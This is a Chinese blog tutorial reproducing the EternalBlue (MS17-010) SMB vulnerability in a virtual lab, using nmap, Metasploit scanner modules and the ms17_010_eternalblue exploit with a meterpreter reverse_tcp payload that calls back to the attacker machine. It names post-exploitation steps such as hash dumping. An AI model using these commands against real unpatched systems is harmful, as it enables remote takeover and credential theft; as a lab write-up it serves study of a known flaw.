欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

永恒之蓝 MS17-010漏洞复现

程序员文章站 2022-03-24 14:15:30
...

目录导航



一. 复现环境

工具:msf
攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24
测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243
网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模式


二. 漏洞原理
1.漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和*机构专网中招,被勒索支付高额赎金才能解密恢复文件
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码
注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无

2.漏洞原理代码详解

想要从代码详细理解该漏洞的可以点击查看:

http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772
https://blog.csdn.net/qq_27446553/article/details/73480807



三. 漏洞复现

1.信息收集

- 确认网络情况
永恒之蓝 MS17-010漏洞复现
- 探测敏感端口

1. 使用nmap扫描(推荐)

nmap -p 445 -sV -Pn 169.254.93.24

永恒之蓝 MS17-010漏洞复现
可以看到这里扫描的结果显示目标主机开启了445端口;而永恒之蓝利用的就是445端口的smb服务也就是操作系统溢出漏洞

2.使用msf syn扫描模块

使用msf的扫描模块,通过search scanner可以查看大量的扫描模块,这里通过search portscan命令查看端口扫描器列表,输入use 模块名,即可使用该模块

msf5 exploit(windows/smb/ms17_010_eternalblue) > search scanner

永恒之蓝 MS17-010漏洞复现

msf5 exploit(windows/smb/ms17_010_eternalblue) > search portscan
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > show options 

永恒之蓝 MS17-010漏洞复现

这里说明一下参数的意义:
set rhosts 这个选项是设置要扫描的目标主机ip  如果设置本机则是lhosts
set ports  这个选项是设置要扫描目标主机的端口范围
set threads 这个选项是设置扫描是的线程 一般50足够了
show options 查看我们设置的参数情况

永恒之蓝 MS17-010漏洞复现
可以看到这里扫描的结果显示目标记器0-500的端口内开了80,135,445端口;而永恒之蓝利用的就是445端口中的smb服务作为攻击载体
永恒之蓝 MS17-010漏洞复现

2.漏洞探测

1.命令行输入 search ms17-010 查看关于永恒之蓝的漏洞模块
永恒之蓝 MS17-010漏洞复现
可以看到有auxiliary(辅助)模块和exploit(攻击)模块,而我们现在要使用的是模块二,用来进行对永恒之蓝的漏洞探测

msf5 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/smb/smb_ms17_010

永恒之蓝 MS17-010漏洞复现
扫描结果显示该主机很容易受到ms17-010的攻击

3.漏洞利用

使用攻击模块:uexploit/windows/smb/ms17_010_eternalblue 进行攻击
选择攻击模块时要根据不同版本的操作系统来选择合适的攻击模块

set payload :设置payload,这里用set payload windows/x64/meterpreter/reverse_tcp
要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload
show options :使用该命令会列出使用当前模块所需呀配置的参数
set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444

永恒之蓝 MS17-010漏洞复现
所有条件设置好后 输入run:开始攻击
攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话
永恒之蓝 MS17-010漏洞复现
到这里漏洞攻击已经成功,接下来要做的就是后渗透攻击,涉及到权限提升,跳板攻击,密码哈希值获取,获取shell以及其他更多信息

相关标签: 漏洞复现